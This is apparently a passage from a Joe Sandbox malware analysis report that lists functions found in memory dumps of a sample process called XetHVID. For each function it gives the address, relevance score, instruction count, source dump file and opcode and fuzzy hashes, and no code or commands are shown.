                                                                  • Opcode ID: 892dd68c8127e27b98f77a032e86f1d20dbadb5f18a1f924727bc3f8da4e55c3
                                                                  • Instruction ID: 06b77979b00414a10dd38ad639501d99c3d637b8a29fe1e6b5857ca5e15ef9b6
                                                                  • Opcode Fuzzy Hash: 892dd68c8127e27b98f77a032e86f1d20dbadb5f18a1f924727bc3f8da4e55c3
                                                                  • Instruction Fuzzy Hash: A8319E76A10210CFD744AF28C458BA97BF6FF49B01F1544AAD509DB362CB75DC01CBA1
                                                                  Function 0563AF48 Relevance: .1, Instructions: 88COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1729134860.0000000005630000.00000040.00000800.00020000.00000000.sdmp, Offset: 05630000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_5630000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: ea5f3d9de39eb51e393fc9b62d07ab08dc96eab89f5b7071923193db2681a7fd
                                                                  • Instruction ID: 6e15863755d655f9e9e7559d7dd863a4e7a0020c89316146b1d870f28e09b861
                                                                  • Opcode Fuzzy Hash: ea5f3d9de39eb51e393fc9b62d07ab08dc96eab89f5b7071923193db2681a7fd
                                                                  • Instruction Fuzzy Hash: 6231F675E04204CFDB24EBB8C1557ADBAB2EF88350F14487DC412AB3A4DB394984CBD5
                                                                  Function 073C17F0 Relevance: .1, Instructions: 86COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1730076775.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_73c0000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: b4be1946a6cda23d0f29c6069e5a016c079c2a8f047d5e2f185d2d59d0ba1035
                                                                  • Instruction ID: c9235e3f77b643c43040e17c02315e7c095bbf5d1ed23a9152057e1805d10b43
                                                                  • Opcode Fuzzy Hash: b4be1946a6cda23d0f29c6069e5a016c079c2a8f047d5e2f185d2d59d0ba1035
                                                                  • Instruction Fuzzy Hash: 1631EEF5A2130A8FEB18CF64C619AAD7BB6AF48301F14016DE40AD7342CE35CC41DB92
                                                                  Function 073CC308 Relevance: .1, Instructions: 85COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1730076775.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_73c0000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 8361abdb3d4a37df4161cc96787ebf6fc9363cff51af385f79d730043516fe5f
                                                                  • Instruction ID: 080312ef3ba4f582afbd5f97bfcb27598ec5241bdad7d2ee27229d02f2f71a42
                                                                  • Opcode Fuzzy Hash: 8361abdb3d4a37df4161cc96787ebf6fc9363cff51af385f79d730043516fe5f
                                                                  • Instruction Fuzzy Hash: E021A0F0714125CBF725CA1994007BA72ABBBC2701F64E42E940F9FA85CA769C428776
                                                                  Function 073C6568 Relevance: .1, Instructions: 84COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1730076775.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_73c0000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 6fdc9bf854c7c05d62c771e19fc76b412d41dc2cb7d0021bc891584b778b3e13
                                                                  • Instruction ID: 7077a6c6f91225fc2bc11941e08d0414a229323d4b8801a8af6a4d08bad075af
                                                                  • Opcode Fuzzy Hash: 6fdc9bf854c7c05d62c771e19fc76b412d41dc2cb7d0021bc891584b778b3e13
                                                                  • Instruction Fuzzy Hash: F931F6F4E1020EDFDB40DFA8D9915EEBBF5EF88310F104469E609E7650EB309A548BA0
                                                                  Function 073C6B51 Relevance: .1, Instructions: 84COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1730076775.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_73c0000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: a4fa944ff9dfe0154786c3874e41c6be363d5fcc78bfd77f59d6deca12beac73
                                                                  • Instruction ID: ceecddcaf5bf4a42ca446d8d5557f5696b24f07bad33b77c7be9c71d3e17a3d9
                                                                  • Opcode Fuzzy Hash: a4fa944ff9dfe0154786c3874e41c6be363d5fcc78bfd77f59d6deca12beac73
                                                                  • Instruction Fuzzy Hash: 3E31DFF0604108CFE700DF58D4A27AAB7F5EB86318F14C45ED15E9B782CB369D468BA1
                                                                  Function 08CF9240 Relevance: .1, Instructions: 84COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1731409307.0000000008CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08CF0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_8cf0000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: cb0a710615401a0ee1c92a3d797df8840e06ea2f898f9b65fee47fb4a6f13159
                                                                  • Instruction ID: b1aebf9040fab850273f51e7a657d1b34584a080ae515502b78d7feafeec2b2e
                                                                  • Opcode Fuzzy Hash: cb0a710615401a0ee1c92a3d797df8840e06ea2f898f9b65fee47fb4a6f13159
                                                                  • Instruction Fuzzy Hash: B72138367106108FEF24CA64C4826BEBBF2EB85215B18807AD646C3395C634EE46C761
                                                                  Function 0563EF19 Relevance: .1, Instructions: 83COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1729134860.0000000005630000.00000040.00000800.00020000.00000000.sdmp, Offset: 05630000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_5630000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 39a45f48b966e52cae0745245127832e574a36dea04227c32958b64a13d647a6
                                                                  • Instruction ID: 0c6411f875f608430f17a7ee22dff6047f46a7220ebbb4c310fa78d816418d39
                                                                  • Opcode Fuzzy Hash: 39a45f48b966e52cae0745245127832e574a36dea04227c32958b64a13d647a6
                                                                  • Instruction Fuzzy Hash: 71218071F001555BCB10DBAAC905ABFBFFAAFC5300F14856AE414D3250EB718E41CBA1
                                                                  Function 08CF9728 Relevance: .1, Instructions: 82COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1731409307.0000000008CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08CF0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_8cf0000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: d2cd0c9696d2f4d42691266e3434ae621a32ee9ea0ef942e0deffe80a7ef87c0
                                                                  • Instruction ID: 38e015b043153aa0ddcc95ce25b05f6183b87838d353c4180b928d3fb014063b
                                                                  • Opcode Fuzzy Hash: d2cd0c9696d2f4d42691266e3434ae621a32ee9ea0ef942e0deffe80a7ef87c0
                                                                  • Instruction Fuzzy Hash: 9E21F970E00225C7DB55BB75C4841EEFB70EF41316F11497AC64A6B346FA31D9258FA0
                                                                  Function 073C6C11 Relevance: .1, Instructions: 81COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1730076775.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_73c0000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: b219032f85b81602ca40905b41e6ac0995c147f3f30910e456412debff34ded9
                                                                  • Instruction ID: 19d84f0b35fa6a45fe870a07cb6e841824043f9fae3d948486fad3edc1b3c66d
                                                                  • Opcode Fuzzy Hash: b219032f85b81602ca40905b41e6ac0995c147f3f30910e456412debff34ded9
                                                                  • Instruction Fuzzy Hash: B631DFF0614118CFE700DF58C4927AAB7B5EB86314F14C86ED15EDBB82CB369D468BA0
                                                                  Function 08CFAB00 Relevance: .1, Instructions: 80COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1731409307.0000000008CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08CF0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_8cf0000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: d60f8693e4d3b65e5757f8fcf4ed1156e66797cec430222fa29ef4a35fc240a0
                                                                  • Instruction ID: 3fcd5384182a2612fd322406b44b9a683613334e545054612c92380f3cd9afbb
                                                                  • Opcode Fuzzy Hash: d60f8693e4d3b65e5757f8fcf4ed1156e66797cec430222fa29ef4a35fc240a0
                                                                  • Instruction Fuzzy Hash: A6318C71A112298FDB44DFA8C854ADDBBF2BF88305F15406AD505FB361DB759901CB90
                                                                  Function 05639AD0 Relevance: .1, Instructions: 79COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1729134860.0000000005630000.00000040.00000800.00020000.00000000.sdmp, Offset: 05630000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_5630000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 16f43f220af0a05342c964d96dd597252d8df57c494a3adf01f656a5b0c05951
                                                                  • Instruction ID: 4a38b93f70111d6e97aee4496709d0b1ea3b6e1597298121127757d182568fe3
                                                                  • Opcode Fuzzy Hash: 16f43f220af0a05342c964d96dd597252d8df57c494a3adf01f656a5b0c05951
                                                                  • Instruction Fuzzy Hash: 01310F32D10B0ADECB01AFB8D844899FBB1FF95354B118B59E95967221EB30E695CB80
                                                                  Function 08CF9250 Relevance: .1, Instructions: 79COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1731409307.0000000008CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08CF0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_8cf0000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 998123c4baa145717321133fe14bf43871cd3d01f8ba9ffa5538938d0dedeabd
                                                                  • Instruction ID: 2673a7347c344cf32639b9a9e958776135863d7e5982f88de001df338bdf1c75
                                                                  • Opcode Fuzzy Hash: 998123c4baa145717321133fe14bf43871cd3d01f8ba9ffa5538938d0dedeabd
                                                                  • Instruction Fuzzy Hash: 6721D7367106108FEF24DA65C481A7EBBF6EBC4225B18803AD646D3795CA34E986C761
                                                                  Function 073C0FC0 Relevance: .1, Instructions: 78COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1730076775.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_73c0000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 4126dd03d138527a97e10efc20f4a2d3f7d234088014e6f23f8650f49a3f188d
                                                                  • Instruction ID: 6ad67bb0cd180045661be176e656cd6f195df15d1daea680cf4f9158154f2e87
                                                                  • Opcode Fuzzy Hash: 4126dd03d138527a97e10efc20f4a2d3f7d234088014e6f23f8650f49a3f188d
                                                                  • Instruction Fuzzy Hash: 23315735A10649DFCB05EFA8C4548EDBBB5FF89300F01869AD5056B225FB70A989CB91
                                                                  Function 0563B809 Relevance: .1, Instructions: 77COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1729134860.0000000005630000.00000040.00000800.00020000.00000000.sdmp, Offset: 05630000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_5630000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 23d029840c6cce03e3185cd82689f031d4c999ab114fef049ed99e037eea78c6
                                                                  • Instruction ID: 8e272c991339e0f56d195d5d94e0d24225ae1da444e554ef9fcac9bc5fea1a9f
                                                                  • Opcode Fuzzy Hash: 23d029840c6cce03e3185cd82689f031d4c999ab114fef049ed99e037eea78c6
                                                                  • Instruction Fuzzy Hash: 7031F635A10209EFDB01AFA4E98899EBFB6FF89300F444516F502AB365DF319845CBA0
                                                                  Function 073C0FD0 Relevance: .1, Instructions: 77COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1730076775.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_73c0000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: d9b53fb2e6d714311f354bdcc73cb8b2aaf4aba5817525d8058c853be792ce1a
                                                                  • Instruction ID: 30ceb7a456976d6a2720cd2f1558a2d0883ccc525d5b7e66b77ed52403a94a0e
                                                                  • Opcode Fuzzy Hash: d9b53fb2e6d714311f354bdcc73cb8b2aaf4aba5817525d8058c853be792ce1a
                                                                  • Instruction Fuzzy Hash: E831F135A10609DFCB04EFA8D894CDDFBB5FF89310F01865AE5056B224FB70A989CB91
                                                                  Function 073C17AD Relevance: .1, Instructions: 76COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1730076775.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_73c0000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 48b9b6f82f2912757ef8690197f69177f85624858d414671494996bcd76fb15c
                                                                  • Instruction ID: 2caf78699553f6d72adfb5653d6c650c39daaba7727247a5b08ed4c571ad4c06
                                                                  • Opcode Fuzzy Hash: 48b9b6f82f2912757ef8690197f69177f85624858d414671494996bcd76fb15c
                                                                  • Instruction Fuzzy Hash: 0A21D2F1A1530BCFEB25DB60D61566E7BBAEF46201F1840ADD40AD6242CA34CC01EB52
                                                                  Function 073C29E0 Relevance: .1, Instructions: 76COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1730076775.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_73c0000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 58de58205f660be9afa132a2059a0b35ec5b8b7e57eaa4355b69666cd071bf50
                                                                  • Instruction ID: 1cf8c52d7098ff1445cce79741b44a187bf4a8582ba725c39ff148030d06c643
                                                                  • Opcode Fuzzy Hash: 58de58205f660be9afa132a2059a0b35ec5b8b7e57eaa4355b69666cd071bf50
                                                                  • Instruction Fuzzy Hash: 1A218BB9710112CFEB20EBA4E949AAFBBF4FB48365F044029E41D87640DF30D956CBA0
                                                                  Function 08CFE728 Relevance: .1, Instructions: 76COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1731409307.0000000008CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08CF0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_8cf0000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 8e64f2131d24a2038d9eaad3dd51bcee18f84d6dcd9a839405cdeee3700c9953
                                                                  • Instruction ID: 63cfb4693388281b0abd4e980f68d60290976e4686a5f88defaa254e963c1694
                                                                  • Opcode Fuzzy Hash: 8e64f2131d24a2038d9eaad3dd51bcee18f84d6dcd9a839405cdeee3700c9953
                                                                  • Instruction Fuzzy Hash: 7A216231F007198FDB41EF78C5486ADB7B5EF89311F00426AE519E7361EB309A46CB91
                                                                  Function 0563B818 Relevance: .1, Instructions: 75COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1729134860.0000000005630000.00000040.00000800.00020000.00000000.sdmp, Offset: 05630000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_5630000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: fa0d953e88799265fe7859be2e304609533788b3a9c9ae01ad42c0dc28bd1974
                                                                  • Instruction ID: 0d38b0ec47609ab3aa3203d82a0f3b7c6786178a8c6bbea176a9d15c3f10eda2
                                                                  • Opcode Fuzzy Hash: fa0d953e88799265fe7859be2e304609533788b3a9c9ae01ad42c0dc28bd1974
                                                                  • Instruction Fuzzy Hash: 0B21F935A10219EFCB05AFA4D88899EBBB6FF89304F404516F502AB364DF316945CBA0
                                                                  Function 05639AE0 Relevance: .1, Instructions: 74COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1729134860.0000000005630000.00000040.00000800.00020000.00000000.sdmp, Offset: 05630000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_5630000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 291cb95b7a602c4edf992143b6082bdacd3ca3a8d577936708e512ee2fd52529
                                                                  • Instruction ID: 9014818f45d0d4a7cb5d0f6cdef809231f5e628947009b0f7cdd2f93ca60e8e8
                                                                  • Opcode Fuzzy Hash: 291cb95b7a602c4edf992143b6082bdacd3ca3a8d577936708e512ee2fd52529
                                                                  • Instruction Fuzzy Hash: 8D312F32D10B0ADECB01AFB8D844899FB71FF95340B118B5AE95927221FB30E695CB80
                                                                  Function 073C6559 Relevance: .1, Instructions: 74COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1730076775.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_73c0000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 37629d1b9ae8eddd835d0e4e93049dc5c4e242a79eea2d5915347ecde14ee99a
                                                                  • Instruction ID: fac6cd86fb40647eb72c20e21ab59a46ba1c238de256759b12461266deeaac9a
                                                                  • Opcode Fuzzy Hash: 37629d1b9ae8eddd835d0e4e93049dc5c4e242a79eea2d5915347ecde14ee99a
                                                                  • Instruction Fuzzy Hash: 54215AF4E04209DFDF40DFB8D4926EEBBF5AF48310F10446AE509E7640EB349A448BA1
                                                                  Function 08CFA338 Relevance: .1, Instructions: 74COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1731409307.0000000008CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08CF0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_8cf0000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 7343d51c086e2e2d01f7250ab8326679a8741af3dbfe04ae2b08570a9f2d038e
                                                                  • Instruction ID: 41332f59d3a832bbf3ad69e9b5e19a0c4913939c375208f383239a7dccb347a6
                                                                  • Opcode Fuzzy Hash: 7343d51c086e2e2d01f7250ab8326679a8741af3dbfe04ae2b08570a9f2d038e
                                                                  • Instruction Fuzzy Hash: 5321B0303003118BD769AB75985492AB7F6AFC5206B54487DCA46CB796EF31EC06C760
                                                                  Function 0563E938 Relevance: .1, Instructions: 73COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1729134860.0000000005630000.00000040.00000800.00020000.00000000.sdmp, Offset: 05630000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_5630000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 352ce9205e129a1b24c75d0e1a1f87caf2ee812b545cb0802c258c0eee49fa58
                                                                  • Instruction ID: 7f101466d163458748c1b419b09eecb3e79f8c467202c665b959c851b0de8c9d
                                                                  • Opcode Fuzzy Hash: 352ce9205e129a1b24c75d0e1a1f87caf2ee812b545cb0802c258c0eee49fa58
                                                                  • Instruction Fuzzy Hash: 7721CF76E0021A9BDF04DFA9C980AEEB7F6FF98340F54442AD405E7250EB349A01CBB1
                                                                  Function 00D9D1B4 Relevance: .1, Instructions: 72COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1722105506.0000000000D9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D9D000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_d9d000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: dd0d92218b874f9df9dca409ae7990f7c718ae4fb3ce8082989e3202f347325e
                                                                  • Instruction ID: 6ff41d8ccef00d16bc5460f2ecfb3abcdb57a32792d964572fd4028697d3d44b
                                                                  • Opcode Fuzzy Hash: dd0d92218b874f9df9dca409ae7990f7c718ae4fb3ce8082989e3202f347325e
                                                                  • Instruction Fuzzy Hash: B321F275604300AFCF05DF14C9C4B26BBA6FB94314F24C96DE84A4B292C336D806CA71
                                                                  Function 00D9D36C Relevance: .1, Instructions: 72COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1722105506.0000000000D9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D9D000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_d9d000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: ae4d9b99069d12c127b5a67cd69d4d389136343a59a5afa502d68ee7f471bf2c
                                                                  • Instruction ID: 0db95a718fca0a41ca6294041646cd8f7c3bf463fe7da07d933febd65f8539ac
                                                                  • Opcode Fuzzy Hash: ae4d9b99069d12c127b5a67cd69d4d389136343a59a5afa502d68ee7f471bf2c
                                                                  • Instruction Fuzzy Hash: 6B212271604204DFCF00DF14D9C4B26BBA6FB94325F24C66DE80A4B282C33AE846CA72
                                                                  Function 08CF3468 Relevance: .1, Instructions: 72COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1731409307.0000000008CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08CF0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_8cf0000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 63a304e001c9100b8761f4426d880e58e65f1d400b8a0aa217e2f33fdab3b100
                                                                  • Instruction ID: bcdd2ddb6f80f5857f6448e5f37e33a55fe2fd77e170ff17688908de129e18a6
                                                                  • Opcode Fuzzy Hash: 63a304e001c9100b8761f4426d880e58e65f1d400b8a0aa217e2f33fdab3b100
                                                                  • Instruction Fuzzy Hash: 7A218C74A00246DFDB41DFB8C484A6E7FB1AB89211F054479E905DB362D731EC81CBA1
                                                                  Function 073C02A0 Relevance: .1, Instructions: 71COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1730076775.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_73c0000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: d8bc29d64fbe103427ea92c58e025aeee2ac24b91db446f0c1f10954e1790d89
                                                                  • Instruction ID: 6344073fff4d5df9206ec4d207719f581278c8677296b91264f68a4ad73a6802
                                                                  • Opcode Fuzzy Hash: d8bc29d64fbe103427ea92c58e025aeee2ac24b91db446f0c1f10954e1790d89
                                                                  • Instruction Fuzzy Hash: 04211275A1020A8FCF44EF69C8849AEB7B5FF89300B518569D909B7355EB30AD45CBA0
                                                                  Function 05639930 Relevance: .1, Instructions: 70COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1729134860.0000000005630000.00000040.00000800.00020000.00000000.sdmp, Offset: 05630000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_5630000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 7aa341776223cdf8e3e5efe483495478e96b2b768377403659cdef56abae1009
                                                                  • Instruction ID: 810575e351e2bd62af749cf33045bc6087cac326162ef0d7b6796e32af99e126
                                                                  • Opcode Fuzzy Hash: 7aa341776223cdf8e3e5efe483495478e96b2b768377403659cdef56abae1009
                                                                  • Instruction Fuzzy Hash: 961122343002211FEB04676CD852B6E76E7DBC5B18F40402AE906D77D5CDBAEC4187E5
                                                                  Function 073CC536 Relevance: .1, Instructions: 70COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1730076775.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_73c0000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 999b4a96cefc356e57639f63074d544ecb5df8776939aa2f0cbd1cd9ea5ba51c
                                                                  • Instruction ID: 2048b59569e9e37049a44055f5bc20ae93f8aed5544eb409e30a73683bdfa271
                                                                  • Opcode Fuzzy Hash: 999b4a96cefc356e57639f63074d544ecb5df8776939aa2f0cbd1cd9ea5ba51c
                                                                  • Instruction Fuzzy Hash: 502165F1E38515C7F311CA6AC440679B3A9AB4A310F01A15FA31ECAA90C774ED908B76
                                                                  Function 073C0290 Relevance: .1, Instructions: 70COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1730076775.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_73c0000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: f999395110207b7b964f317b75630d1556b515736adc9e97cf24f02a480534c3
                                                                  • Instruction ID: c6871b7fd6f2d97d9897730808a09048d267feb62845cd8c20e04d6e58c25842
                                                                  • Opcode Fuzzy Hash: f999395110207b7b964f317b75630d1556b515736adc9e97cf24f02a480534c3
                                                                  • Instruction Fuzzy Hash: D7216DB5B112058FDF44DF68C8848AEBBB5FF88200B40457AD90AE7351EB30AD05CBA0
                                                                  Function 0563737C Relevance: .1, Instructions: 69COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1729134860.0000000005630000.00000040.00000800.00020000.00000000.sdmp, Offset: 05630000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_5630000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 966f4d5145d9f002168427f8660da638c50248dfe725575d7f7d5e22f64dca21
                                                                  • Instruction ID: a411e2ed44f488d650f10fcc11db8f518632955a3a567efcad76e9d92080b695
                                                                  • Opcode Fuzzy Hash: 966f4d5145d9f002168427f8660da638c50248dfe725575d7f7d5e22f64dca21
